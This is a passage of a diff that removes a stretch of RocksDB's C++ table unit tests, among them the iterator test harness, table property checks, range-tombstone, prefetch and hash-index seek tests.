-  std::vector<TestArgs> test_args;
-  std::vector<TestType> test_types = {
-      BLOCK_BASED_TABLE_TEST,
-#ifndef ROCKSDB_LITE
-      PLAIN_TABLE_SEMI_FIXED_PREFIX,
-      PLAIN_TABLE_FULL_STR_PREFIX,
-      PLAIN_TABLE_TOTAL_ORDER,
-#endif  // !ROCKSDB_LITE
-      BLOCK_TEST,
-      MEMTABLE_TEST, DB_TEST};
-  std::vector<bool> reverse_compare_types = {false, true};
-  std::vector<int> restart_intervals = {16, 1, 1024};
-
-  // Only add compression if it is supported
-  std::vector<std::pair<CompressionType, bool>> compression_types;
-  compression_types.emplace_back(kNoCompression, false);
-  if (Snappy_Supported()) {
-    compression_types.emplace_back(kSnappyCompression, false);
-  }
-  if (Zlib_Supported()) {
-    compression_types.emplace_back(kZlibCompression, false);
-    compression_types.emplace_back(kZlibCompression, true);
-  }
-  if (BZip2_Supported()) {
-    compression_types.emplace_back(kBZip2Compression, false);
-    compression_types.emplace_back(kBZip2Compression, true);
-  }
-  if (LZ4_Supported()) {
-    compression_types.emplace_back(kLZ4Compression, false);
-    compression_types.emplace_back(kLZ4Compression, true);
-    compression_types.emplace_back(kLZ4HCCompression, false);
-    compression_types.emplace_back(kLZ4HCCompression, true);
-  }
-  if (XPRESS_Supported()) {
-    compression_types.emplace_back(kXpressCompression, false);
-    compression_types.emplace_back(kXpressCompression, true);
-  }
-  if (ZSTD_Supported()) {
-    compression_types.emplace_back(kZSTD, false);
-    compression_types.emplace_back(kZSTD, true);
-  }
-
-  for (auto test_type : test_types) {
-    for (auto reverse_compare : reverse_compare_types) {
-#ifndef ROCKSDB_LITE
-      if (test_type == PLAIN_TABLE_SEMI_FIXED_PREFIX ||
-          test_type == PLAIN_TABLE_FULL_STR_PREFIX ||
-          test_type == PLAIN_TABLE_TOTAL_ORDER) {
-        // Plain table doesn't use restart index or compression.
-        TestArgs one_arg;
-        one_arg.type = test_type;
-        one_arg.reverse_compare = reverse_compare;
-        one_arg.restart_interval = restart_intervals[0];
-        one_arg.compression = compression_types[0].first;
-        one_arg.use_mmap = true;
-        test_args.push_back(one_arg);
-        one_arg.use_mmap = false;
-        test_args.push_back(one_arg);
-        continue;
-      }
-#endif  // !ROCKSDB_LITE
-
-      for (auto restart_interval : restart_intervals) {
-        for (auto compression_type : compression_types) {
-          TestArgs one_arg;
-          one_arg.type = test_type;
-          one_arg.reverse_compare = reverse_compare;
-          one_arg.restart_interval = restart_interval;
-          one_arg.compression = compression_type.first;
-          one_arg.format_version = compression_type.second ? 2 : 1;
-          one_arg.use_mmap = false;
-          test_args.push_back(one_arg);
-        }
-      }
-    }
-  }
-  return test_args;
-}
-
-// In order to make all tests run for plain table format, including
-// those operating on empty keys, create a new prefix transformer which
-// return fixed prefix if the slice is not shorter than the prefix length,
-// and the full slice if it is shorter.
-class FixedOrLessPrefixTransform : public SliceTransform {
- private:
-  const size_t prefix_len_;
-
- public:
-  explicit FixedOrLessPrefixTransform(size_t prefix_len) :
-      prefix_len_(prefix_len) {
-  }
-
-  virtual const char* Name() const override { return "rocksdb.FixedPrefix"; }
-
-  virtual Slice Transform(const Slice& src) const override {
-    assert(InDomain(src));
-    if (src.size() < prefix_len_) {
-      return src;
-    }
-    return Slice(src.data(), prefix_len_);
-  }
-
-  virtual bool InDomain(const Slice& src) const override { return true; }
-
-  virtual bool InRange(const Slice& dst) const override {
-    return (dst.size() <= prefix_len_);
-  }
-};
-
-class HarnessTest : public testing::Test {
- public:
-  HarnessTest()
-      : ioptions_(options_),
-        constructor_(nullptr),
-        write_buffer_(options_.db_write_buffer_size) {}
-
-  void Init(const TestArgs& args) {
-    delete constructor_;
-    constructor_ = nullptr;
-    options_ = Options();
-    options_.compression = args.compression;
-    // Use shorter block size for tests to exercise block boundary
-    // conditions more.
-    if (args.reverse_compare) {
-      options_.comparator = &reverse_key_comparator;
-    }
-
-    internal_comparator_.reset(
-        new test::PlainInternalKeyComparator(options_.comparator));
-
-    support_prev_ = true;
-    only_support_prefix_seek_ = false;
-    options_.allow_mmap_reads = args.use_mmap;
-    switch (args.type) {
-      case BLOCK_BASED_TABLE_TEST:
-        table_options_.flush_block_policy_factory.reset(
-            new FlushBlockBySizePolicyFactory());
-        table_options_.block_size = 256;
-        table_options_.block_restart_interval = args.restart_interval;
-        table_options_.index_block_restart_interval = args.restart_interval;
-        table_options_.format_version = args.format_version;
-        options_.table_factory.reset(
-            new BlockBasedTableFactory(table_options_));
-        constructor_ = new TableConstructor(
-            options_.comparator, true /* convert_to_internal_key_ */);
-        internal_comparator_.reset(
-            new InternalKeyComparator(options_.comparator));
-        break;
-// Plain table is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-      case PLAIN_TABLE_SEMI_FIXED_PREFIX:
-        support_prev_ = false;
-        only_support_prefix_seek_ = true;
-        options_.prefix_extractor.reset(new FixedOrLessPrefixTransform(2));
-        options_.table_factory.reset(NewPlainTableFactory());
-        constructor_ = new TableConstructor(
-            options_.comparator, true /* convert_to_internal_key_ */);
-        internal_comparator_.reset(
-            new InternalKeyComparator(options_.comparator));
-        break;
-      case PLAIN_TABLE_FULL_STR_PREFIX:
-        support_prev_ = false;
-        only_support_prefix_seek_ = true;
-        options_.prefix_extractor.reset(NewNoopTransform());
-        options_.table_factory.reset(NewPlainTableFactory());
-        constructor_ = new TableConstructor(
-            options_.comparator, true /* convert_to_internal_key_ */);
-        internal_comparator_.reset(
-            new InternalKeyComparator(options_.comparator));
-        break;
-      case PLAIN_TABLE_TOTAL_ORDER:
-        support_prev_ = false;
-        only_support_prefix_seek_ = false;
-        options_.prefix_extractor = nullptr;
-
-        {
-          PlainTableOptions plain_table_options;
-          plain_table_options.user_key_len = kPlainTableVariableLength;
-          plain_table_options.bloom_bits_per_key = 0;
-          plain_table_options.hash_table_ratio = 0;
-
-          options_.table_factory.reset(
-              NewPlainTableFactory(plain_table_options));
-        }
-        constructor_ = new TableConstructor(
-            options_.comparator, true /* convert_to_internal_key_ */);
-        internal_comparator_.reset(
-            new InternalKeyComparator(options_.comparator));
-        break;
-#endif  // !ROCKSDB_LITE
-      case BLOCK_TEST:
-        table_options_.block_size = 256;
-        options_.table_factory.reset(
-            new BlockBasedTableFactory(table_options_));
-        constructor_ = new BlockConstructor(options_.comparator);
-        break;
-      case MEMTABLE_TEST:
-        table_options_.block_size = 256;
-        options_.table_factory.reset(
-            new BlockBasedTableFactory(table_options_));
-        constructor_ = new MemTableConstructor(options_.comparator,
-                                               &write_buffer_);
-        break;
-      case DB_TEST:
-        table_options_.block_size = 256;
-        options_.table_factory.reset(
-            new BlockBasedTableFactory(table_options_));
-        constructor_ = new DBConstructor(options_.comparator);
-        break;
-    }
-    ioptions_ = ImmutableCFOptions(options_);
-  }
-
-  ~HarnessTest() { delete constructor_; }
-
-  void Add(const std::string& key, const std::string& value) {
-    constructor_->Add(key, value);
-  }
-
-  void Test(Random* rnd) {
-    std::vector<std::string> keys;
-    stl_wrappers::KVMap data;
-    constructor_->Finish(options_, ioptions_, table_options_,
-                         *internal_comparator_, &keys, &data);
-
-    TestForwardScan(keys, data);
-    if (support_prev_) {
-      TestBackwardScan(keys, data);
-    }
-    TestRandomAccess(rnd, keys, data);
-  }
-
-  void TestForwardScan(const std::vector<std::string>& keys,
-                       const stl_wrappers::KVMap& data) {
-    InternalIterator* iter = constructor_->NewIterator();
-    ASSERT_TRUE(!iter->Valid());
-    iter->SeekToFirst();
-    for (stl_wrappers::KVMap::const_iterator model_iter = data.begin();
-         model_iter != data.end(); ++model_iter) {
-      ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-      iter->Next();
-    }
-    ASSERT_TRUE(!iter->Valid());
-    if (constructor_->IsArenaMode() && !constructor_->AnywayDeleteIterator()) {
-      iter->~InternalIterator();
-    } else {
-      delete iter;
-    }
-  }
-
-  void TestBackwardScan(const std::vector<std::string>& keys,
-                        const stl_wrappers::KVMap& data) {
-    InternalIterator* iter = constructor_->NewIterator();
-    ASSERT_TRUE(!iter->Valid());
-    iter->SeekToLast();
-    for (stl_wrappers::KVMap::const_reverse_iterator model_iter = data.rbegin();
-         model_iter != data.rend(); ++model_iter) {
-      ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-      iter->Prev();
-    }
-    ASSERT_TRUE(!iter->Valid());
-    if (constructor_->IsArenaMode() && !constructor_->AnywayDeleteIterator()) {
-      iter->~InternalIterator();
-    } else {
-      delete iter;
-    }
-  }
-
-  void TestRandomAccess(Random* rnd, const std::vector<std::string>& keys,
-                        const stl_wrappers::KVMap& data) {
-    static const bool kVerbose = false;
-    InternalIterator* iter = constructor_->NewIterator();
-    ASSERT_TRUE(!iter->Valid());
-    stl_wrappers::KVMap::const_iterator model_iter = data.begin();
-    if (kVerbose) fprintf(stderr, "---\n");
-    for (int i = 0; i < 200; i++) {
-      const int toss = rnd->Uniform(support_prev_ ? 5 : 3);
-      switch (toss) {
-        case 0: {
-          if (iter->Valid()) {
-            if (kVerbose) fprintf(stderr, "Next\n");
-            iter->Next();
-            ++model_iter;
-            ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-          }
-          break;
-        }
-
-        case 1: {
-          if (kVerbose) fprintf(stderr, "SeekToFirst\n");
-          iter->SeekToFirst();
-          model_iter = data.begin();
-          ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-          break;
-        }
-
-        case 2: {
-          std::string key = PickRandomKey(rnd, keys);
-          model_iter = data.lower_bound(key);
-          if (kVerbose) fprintf(stderr, "Seek '%s'\n",
-                                EscapeString(key).c_str());
-          iter->Seek(Slice(key));
-          ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-          break;
-        }
-
-        case 3: {
-          if (iter->Valid()) {
-            if (kVerbose) fprintf(stderr, "Prev\n");
-            iter->Prev();
-            if (model_iter == data.begin()) {
-              model_iter = data.end();   // Wrap around to invalid value
-            } else {
-              --model_iter;
-            }
-            ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-          }
-          break;
-        }
-
-        case 4: {
-          if (kVerbose) fprintf(stderr, "SeekToLast\n");
-          iter->SeekToLast();
-          if (keys.empty()) {
-            model_iter = data.end();
-          } else {
-            std::string last = data.rbegin()->first;
-            model_iter = data.lower_bound(last);
-          }
-          ASSERT_EQ(ToString(data, model_iter), ToString(iter));
-          break;
-        }
-      }
-    }
-    if (constructor_->IsArenaMode() && !constructor_->AnywayDeleteIterator()) {
-      iter->~InternalIterator();
-    } else {
-      delete iter;
-    }
-  }
-
-  std::string ToString(const stl_wrappers::KVMap& data,
-                       const stl_wrappers::KVMap::const_iterator& it) {
-    if (it == data.end()) {
-      return "END";
-    } else {
-      return "'" + it->first + "->" + it->second + "'";
-    }
-  }
-
-  std::string ToString(const stl_wrappers::KVMap& data,
-                       const stl_wrappers::KVMap::const_reverse_iterator& it) {
-    if (it == data.rend()) {
-      return "END";
-    } else {
-      return "'" + it->first + "->" + it->second + "'";
-    }
-  }
-
-  std::string ToString(const InternalIterator* it) {
-    if (!it->Valid()) {
-      return "END";
-    } else {
-      return "'" + it->key().ToString() + "->" + it->value().ToString() + "'";
-    }
-  }
-
-  std::string PickRandomKey(Random* rnd, const std::vector<std::string>& keys) {
-    if (keys.empty()) {
-      return "foo";
-    } else {
-      const int index = rnd->Uniform(static_cast<int>(keys.size()));
-      std::string result = keys[index];
-      switch (rnd->Uniform(support_prev_ ? 3 : 1)) {
-        case 0:
-          // Return an existing key
-          break;
-        case 1: {
-          // Attempt to return something smaller than an existing key
-          if (result.size() > 0 && result[result.size() - 1] > '\0'
-              && (!only_support_prefix_seek_
-                  || options_.prefix_extractor->Transform(result).size()
-                  < result.size())) {
-            result[result.size() - 1]--;
-          }
-          break;
-      }
-        case 2: {
-          // Return something larger than an existing key
-          Increment(options_.comparator, &result);
-          break;
-        }
-      }
-      return result;
-    }
-  }
-
-  // Returns nullptr if not running against a DB
-  DB* db() const { return constructor_->db(); }
-
- private:
-  Options options_ = Options();
-  ImmutableCFOptions ioptions_;
-  BlockBasedTableOptions table_options_ = BlockBasedTableOptions();
-  Constructor* constructor_;
-  WriteBufferManager write_buffer_;
-  bool support_prev_;
-  bool only_support_prefix_seek_;
-  shared_ptr<InternalKeyComparator> internal_comparator_;
-};
-
-static bool Between(uint64_t val, uint64_t low, uint64_t high) {
-  bool result = (val >= low) && (val <= high);
-  if (!result) {
-    fprintf(stderr, "Value %llu is not in range [%llu, %llu]\n",
-            (unsigned long long)(val),
-            (unsigned long long)(low),
-            (unsigned long long)(high));
-  }
-  return result;
-}
-
-// Tests against all kinds of tables
-class TableTest : public testing::Test {
- public:
-  const InternalKeyComparator& GetPlainInternalComparator(
-      const Comparator* comp) {
-    if (!plain_internal_comparator) {
-      plain_internal_comparator.reset(
-          new test::PlainInternalKeyComparator(comp));
-    }
-    return *plain_internal_comparator;
-  }
-  void IndexTest(BlockBasedTableOptions table_options);
-
- private:
-  std::unique_ptr<InternalKeyComparator> plain_internal_comparator;
-};
-
-class GeneralTableTest : public TableTest {};
-class BlockBasedTableTest : public TableTest {};
-class PlainTableTest : public TableTest {};
-class TablePropertyTest : public testing::Test {};
-
-// This test serves as the living tutorial for the prefix scan of user collected
-// properties.
-TEST_F(TablePropertyTest, PrefixScanTest) {
-  UserCollectedProperties props{{"num.111.1", "1"},
-                                {"num.111.2", "2"},
-                                {"num.111.3", "3"},
-                                {"num.333.1", "1"},
-                                {"num.333.2", "2"},
-                                {"num.333.3", "3"},
-                                {"num.555.1", "1"},
-                                {"num.555.2", "2"},
-                                {"num.555.3", "3"}, };
-
-  // prefixes that exist
-  for (const std::string& prefix : {"num.111", "num.333", "num.555"}) {
-    int num = 0;
-    for (auto pos = props.lower_bound(prefix);
-         pos != props.end() &&
-             pos->first.compare(0, prefix.size(), prefix) == 0;
-         ++pos) {
-      ++num;
-      auto key = prefix + "." + ToString(num);
-      ASSERT_EQ(key, pos->first);
-      ASSERT_EQ(ToString(num), pos->second);
-    }
-    ASSERT_EQ(3, num);
-  }
-
-  // prefixes that don't exist
-  for (const std::string& prefix :
-       {"num.000", "num.222", "num.444", "num.666"}) {
-    auto pos = props.lower_bound(prefix);
-    ASSERT_TRUE(pos == props.end() ||
-                pos->first.compare(0, prefix.size(), prefix) != 0);
-  }
-}
-
-// This test include all the basic checks except those for index size and block
-// size, which will be conducted in separated unit tests.
-TEST_F(BlockBasedTableTest, BasicBlockBasedTableProperties) {
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-
-  c.Add("a1", "val1");
-  c.Add("b2", "val2");
-  c.Add("c3", "val3");
-  c.Add("d4", "val4");
-  c.Add("e5", "val5");
-  c.Add("f6", "val6");
-  c.Add("g7", "val7");
-  c.Add("h8", "val8");
-  c.Add("j9", "val9");
-  uint64_t diff_internal_user_bytes = 9 * 8;  // 8 is seq size, 9 k-v totally
-
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  Options options;
-  options.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_restart_interval = 1;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-
-  auto& props = *c.GetTableReader()->GetTableProperties();
-  ASSERT_EQ(kvmap.size(), props.num_entries);
-
-  auto raw_key_size = kvmap.size() * 2ul;
-  auto raw_value_size = kvmap.size() * 4ul;
-
-  ASSERT_EQ(raw_key_size + diff_internal_user_bytes, props.raw_key_size);
-  ASSERT_EQ(raw_value_size, props.raw_value_size);
-  ASSERT_EQ(1ul, props.num_data_blocks);
-  ASSERT_EQ("", props.filter_policy_name);  // no filter policy is used
-
-  // Verify data size.
-  BlockBuilder block_builder(1);
-  for (const auto& item : kvmap) {
-    block_builder.Add(item.first, item.second);
-  }
-  Slice content = block_builder.Finish();
-  ASSERT_EQ(content.size() + kBlockTrailerSize + diff_internal_user_bytes,
-            props.data_size);
-  c.ResetTableReader();
-}
-
-TEST_F(BlockBasedTableTest, BlockBasedTableProperties2) {
-  TableConstructor c(&reverse_key_comparator);
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-
-  {
-    Options options;
-    options.compression = CompressionType::kNoCompression;
-    BlockBasedTableOptions table_options;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    const ImmutableCFOptions ioptions(options);
-    c.Finish(options, ioptions, table_options,
-             GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-
-    auto& props = *c.GetTableReader()->GetTableProperties();
-
-    // Default comparator
-    ASSERT_EQ("leveldb.BytewiseComparator", props.comparator_name);
-    // No merge operator
-    ASSERT_EQ("nullptr", props.merge_operator_name);
-    // No prefix extractor
-    ASSERT_EQ("nullptr", props.prefix_extractor_name);
-    // No property collectors
-    ASSERT_EQ("[]", props.property_collectors_names);
-    // No filter policy is used
-    ASSERT_EQ("", props.filter_policy_name);
-    // Compression type == that set:
-    ASSERT_EQ("NoCompression", props.compression_name);
-    c.ResetTableReader();
-  }
-
-  {
-    Options options;
-    BlockBasedTableOptions table_options;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    options.comparator = &reverse_key_comparator;
-    options.merge_operator = MergeOperators::CreateUInt64AddOperator();
-    options.prefix_extractor.reset(NewNoopTransform());
-    options.table_properties_collector_factories.emplace_back(
-        new DummyPropertiesCollectorFactory1());
-    options.table_properties_collector_factories.emplace_back(
-        new DummyPropertiesCollectorFactory2());
-
-    const ImmutableCFOptions ioptions(options);
-    c.Finish(options, ioptions, table_options,
-             GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-
-    auto& props = *c.GetTableReader()->GetTableProperties();
-
-    ASSERT_EQ("rocksdb.ReverseBytewiseComparator", props.comparator_name);
-    ASSERT_EQ("UInt64AddOperator", props.merge_operator_name);
-    ASSERT_EQ("rocksdb.Noop", props.prefix_extractor_name);
-    ASSERT_EQ("[DummyPropertiesCollector1,DummyPropertiesCollector2]",
-              props.property_collectors_names);
-    ASSERT_EQ("", props.filter_policy_name);  // no filter policy is used
-    c.ResetTableReader();
-  }
-}
-
-TEST_F(BlockBasedTableTest, RangeDelBlock) {
-  TableConstructor c(BytewiseComparator());
-  std::vector<std::string> keys = {"1pika", "2chu"};
-  std::vector<std::string> vals = {"p", "c"};
-
-  for (int i = 0; i < 2; i++) {
-    RangeTombstone t(keys[i], vals[i], i);
-    std::pair<InternalKey, Slice> p = t.Serialize();
-    c.Add(p.first.Encode().ToString(), p.second);
-  }
-
-  std::vector<std::string> sorted_keys;
-  stl_wrappers::KVMap kvmap;
-  Options options;
-  options.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_restart_interval = 1;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  const ImmutableCFOptions ioptions(options);
-  std::unique_ptr<InternalKeyComparator> internal_cmp(
-      new InternalKeyComparator(options.comparator));
-  c.Finish(options, ioptions, table_options, *internal_cmp, &sorted_keys,
-           &kvmap);
-
-  for (int j = 0; j < 2; ++j) {
-    std::unique_ptr<InternalIterator> iter(
-        c.GetTableReader()->NewRangeTombstoneIterator(ReadOptions()));
-    if (j > 0) {
-      // For second iteration, delete the table reader object and verify the
-      // iterator can still access its metablock's range tombstones.
-      c.ResetTableReader();
-    }
-    ASSERT_FALSE(iter->Valid());
-    iter->SeekToFirst();
-    ASSERT_TRUE(iter->Valid());
-    for (int i = 0; i < 2; i++) {
-      ASSERT_TRUE(iter->Valid());
-      ParsedInternalKey parsed_key;
-      ASSERT_TRUE(ParseInternalKey(iter->key(), &parsed_key));
-      RangeTombstone t(parsed_key, iter->value());
-      ASSERT_EQ(t.start_key_, keys[i]);
-      ASSERT_EQ(t.end_key_, vals[i]);
-      ASSERT_EQ(t.seq_, i);
-      iter->Next();
-    }
-    ASSERT_TRUE(!iter->Valid());
-  }
-}
-
-TEST_F(BlockBasedTableTest, FilterPolicyNameProperties) {
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("a1", "val1");
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-  Options options;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options,
-           GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-  auto& props = *c.GetTableReader()->GetTableProperties();
-  ASSERT_EQ("rocksdb.BuiltinBloomFilter", props.filter_policy_name);
-  c.ResetTableReader();
-}
-
-//
-// BlockBasedTableTest::PrefetchTest
-//
-void AssertKeysInCache(BlockBasedTable* table_reader,
-                       const std::vector<std::string>& keys_in_cache,
-                       const std::vector<std::string>& keys_not_in_cache,
-                       bool convert = false) {
-  if (convert) {
-    for (auto key : keys_in_cache) {
-      InternalKey ikey(key, kMaxSequenceNumber, kTypeValue);
-      ASSERT_TRUE(table_reader->TEST_KeyInCache(ReadOptions(), ikey.Encode()));
-    }
-    for (auto key : keys_not_in_cache) {
-      InternalKey ikey(key, kMaxSequenceNumber, kTypeValue);
-      ASSERT_TRUE(!table_reader->TEST_KeyInCache(ReadOptions(), ikey.Encode()));
-    }
-  } else {
-    for (auto key : keys_in_cache) {
-      ASSERT_TRUE(table_reader->TEST_KeyInCache(ReadOptions(), key));
-    }
-    for (auto key : keys_not_in_cache) {
-      ASSERT_TRUE(!table_reader->TEST_KeyInCache(ReadOptions(), key));
-    }
-  }
-}
-
-void PrefetchRange(TableConstructor* c, Options* opt,
-                   BlockBasedTableOptions* table_options, const char* key_begin,
-                   const char* key_end,
-                   const std::vector<std::string>& keys_in_cache,
-                   const std::vector<std::string>& keys_not_in_cache,
-                   const Status expected_status = Status::OK()) {
-  // reset the cache and reopen the table
-  table_options->block_cache = NewLRUCache(16 * 1024 * 1024, 4);
-  opt->table_factory.reset(NewBlockBasedTableFactory(*table_options));
-  const ImmutableCFOptions ioptions2(*opt);
-  ASSERT_OK(c->Reopen(ioptions2));
-
-  // prefetch
-  auto* table_reader = dynamic_cast<BlockBasedTable*>(c->GetTableReader());
-  Status s;
-  unique_ptr<Slice> begin, end;
-  unique_ptr<InternalKey> i_begin, i_end;
-  if (key_begin != nullptr) {
-    if (c->ConvertToInternalKey()) {
-      i_begin.reset(new InternalKey(key_begin, kMaxSequenceNumber, kTypeValue));
-      begin.reset(new Slice(i_begin->Encode()));
-    } else {
-      begin.reset(new Slice(key_begin));
-    }
-  }
-  if (key_end != nullptr) {
-    if (c->ConvertToInternalKey()) {
-      i_end.reset(new InternalKey(key_end, kMaxSequenceNumber, kTypeValue));
-      end.reset(new Slice(i_end->Encode()));
-    } else {
-      end.reset(new Slice(key_end));
-    }
-  }
-  s = table_reader->Prefetch(begin.get(), end.get());
-
-  ASSERT_TRUE(s.code() == expected_status.code());
-
-  // assert our expectation in cache warmup
-  AssertKeysInCache(table_reader, keys_in_cache, keys_not_in_cache,
-                    c->ConvertToInternalKey());
-  c->ResetTableReader();
-}
-
-TEST_F(BlockBasedTableTest, PrefetchTest) {
-  // The purpose of this test is to test the prefetching operation built into
-  // BlockBasedTable.
-  Options opt;
-  unique_ptr<InternalKeyComparator> ikc;
-  ikc.reset(new test::PlainInternalKeyComparator(opt.comparator));
-  opt.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  // big enough so we don't ever lose cached values.
-  table_options.block_cache = NewLRUCache(16 * 1024 * 1024, 4);
-  opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("k01", "hello");
-  c.Add("k02", "hello2");
-  c.Add("k03", std::string(10000, 'x'));
-  c.Add("k04", std::string(200000, 'x'));
-  c.Add("k05", std::string(300000, 'x'));
-  c.Add("k06", "hello3");
-  c.Add("k07", std::string(100000, 'x'));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  const ImmutableCFOptions ioptions(opt);
-  c.Finish(opt, ioptions, table_options, *ikc, &keys, &kvmap);
-  c.ResetTableReader();
-
-  // We get the following data spread :
-  //
-  // Data block         Index
-  // ========================
-  // [ k01 k02 k03 ]    k03
-  // [ k04         ]    k04
-  // [ k05         ]    k05
-  // [ k06 k07     ]    k07
-
-
-  // Simple
-  PrefetchRange(&c, &opt, &table_options,
-                /*key_range=*/"k01", "k05",
-                /*keys_in_cache=*/{"k01", "k02", "k03", "k04", "k05"},
-                /*keys_not_in_cache=*/{"k06", "k07"});
-  PrefetchRange(&c, &opt, &table_options, "k01", "k01", {"k01", "k02", "k03"},
-                {"k04", "k05", "k06", "k07"});
-  // odd
-  PrefetchRange(&c, &opt, &table_options, "a", "z",
-                {"k01", "k02", "k03", "k04", "k05", "k06", "k07"}, {});
-  PrefetchRange(&c, &opt, &table_options, "k00", "k00", {"k01", "k02", "k03"},
-                {"k04", "k05", "k06", "k07"});
-  // Edge cases
-  PrefetchRange(&c, &opt, &table_options, "k00", "k06",
-                {"k01", "k02", "k03", "k04", "k05", "k06", "k07"}, {});
-  PrefetchRange(&c, &opt, &table_options, "k00", "zzz",
-                {"k01", "k02", "k03", "k04", "k05", "k06", "k07"}, {});
-  // null keys
-  PrefetchRange(&c, &opt, &table_options, nullptr, nullptr,
-                {"k01", "k02", "k03", "k04", "k05", "k06", "k07"}, {});
-  PrefetchRange(&c, &opt, &table_options, "k04", nullptr,
-                {"k04", "k05", "k06", "k07"}, {"k01", "k02", "k03"});
-  PrefetchRange(&c, &opt, &table_options, nullptr, "k05",
-                {"k01", "k02", "k03", "k04", "k05"}, {"k06", "k07"});
-  // invalid
-  PrefetchRange(&c, &opt, &table_options, "k06", "k00", {}, {},
-                Status::InvalidArgument(Slice("k06 "), Slice("k07")));
-  c.ResetTableReader();
-}
-
-TEST_F(BlockBasedTableTest, TotalOrderSeekOnHashIndex) {
-  BlockBasedTableOptions table_options;
-  for (int i = 0; i < 4; ++i) {
-    Options options;
-    // Make each key/value an individual block
-    table_options.block_size = 64;
-    switch (i) {
-    case 0:
-      // Binary search index
-      table_options.index_type = BlockBasedTableOptions::kBinarySearch;
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      break;
-    case 1:
-      // Hash search index
-      table_options.index_type = BlockBasedTableOptions::kHashSearch;
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      options.prefix_extractor.reset(NewFixedPrefixTransform(4));
-      break;
-    case 2:
-      // Hash search index with hash_index_allow_collision
-      table_options.index_type = BlockBasedTableOptions::kHashSearch;
-      table_options.hash_index_allow_collision = true;
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      options.prefix_extractor.reset(NewFixedPrefixTransform(4));
-      break;
-    case 3:
-      // Hash search index with filter policy
-      table_options.index_type = BlockBasedTableOptions::kHashSearch;
-      table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      options.prefix_extractor.reset(NewFixedPrefixTransform(4));
-      break;
-    case 4:
-    default:
-      // Binary search index
-      table_options.index_type = BlockBasedTableOptions::kTwoLevelIndexSearch;
-      options.table_factory.reset(new BlockBasedTableFactory(table_options));
-      break;
-    }
-
-    TableConstructor c(BytewiseComparator(),
-                       true /* convert_to_internal_key_ */);
-    c.Add("aaaa1", std::string('a', 56));
-    c.Add("bbaa1", std::string('a', 56));
-    c.Add("cccc1", std::string('a', 56));
-    c.Add("bbbb1", std::string('a', 56));
-    c.Add("baaa1", std::string('a', 56));
-    c.Add("abbb1", std::string('a', 56));
-    c.Add("cccc2", std::string('a', 56));
-    std::vector<std::string> keys;
-    stl_wrappers::KVMap kvmap;
-    const ImmutableCFOptions ioptions(options);
-    c.Finish(options, ioptions, table_options,
-             GetPlainInternalComparator(options.comparator), &keys, &kvmap);
-    auto props = c.GetTableReader()->GetTableProperties();
-    ASSERT_EQ(7u, props->num_data_blocks);
-    auto* reader = c.GetTableReader();
-    ReadOptions ro;
-    ro.total_order_seek = true;
-    std::unique_ptr<InternalIterator> iter(reader->NewIterator(ro));
-
-    iter->Seek(InternalKey("b", 0, kTypeValue).Encode());
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("baaa1", ExtractUserKey(iter->key()).ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("bbaa1", ExtractUserKey(iter->key()).ToString());
-
-    iter->Seek(InternalKey("bb", 0, kTypeValue).Encode());
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("bbaa1", ExtractUserKey(iter->key()).ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("bbbb1", ExtractUserKey(iter->key()).ToString());
-
-    iter->Seek(InternalKey("bbb", 0, kTypeValue).Encode());
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("bbbb1", ExtractUserKey(iter->key()).ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("cccc1", ExtractUserKey(iter->key()).ToString());
-  }
-}
-
-TEST_F(BlockBasedTableTest, NoopTransformSeek) {
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-
-  Options options;
-  options.comparator = BytewiseComparator();
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  options.prefix_extractor.reset(NewNoopTransform());
-
-  TableConstructor c(options.comparator);
